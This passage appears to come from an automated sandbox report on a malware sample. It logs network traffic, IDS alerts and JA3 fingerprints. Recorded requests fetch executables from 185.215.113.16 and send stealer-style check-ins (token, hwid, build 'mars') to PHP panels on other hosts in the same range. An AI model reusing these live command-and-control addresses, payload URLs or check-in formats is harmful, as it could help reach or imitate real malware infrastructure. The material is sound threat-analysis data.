6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="message"ybncbhylepme------EHCGIJDHDGDBGDGCGCFH--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 35 39 65 39 61 36 64 30 63 65 38 37 65 39 63 38 35 39 30 33 64 62 63 62 30 32 37 37 31 34 30 35 36 35 36 66 32 36 32 33 35 62 63 36 35 33 62 61 61 62 35 30 36 65 33 39 65 31 31 33 39 66 38 65 34 62 35 36 64 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"5a59e9a6d0ce87e9c85903dbcb02771405656f26235bc653baab506e39e1139f8e4b56db------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BGDAAKJJDAAKFHJKJKFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005695001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Tue, 12 Nov 2024 05:07:27 GMTIf-None-Match: "6732e28f-1bb600"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 2d 2d 0d 0a Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build"mars------AEHIJDAFBKFHIDGCFBFC--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 36 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005696031&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 35 36 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1005697001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 2d 2d 0d 0a Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build"mars------DBKKFHIEGDHJKECAAKKE--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 30 45 43 33 35 30 44 46 31 46 31 36 32 32 33 37 39 37 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 2d 2d 0d 0a Data Ascii: ------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="hwid"A00EC350DF1F1622379703------BKKFCFBKFCFBFIDGCGDHContent-Disposition: form-data; name="build"mars------BKKFCFBKFCFBFIDGCGDH--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49779 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:54620 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:54772 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:54788 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:54650 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C75CC60 PR_Recv,

0_2_6C75CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
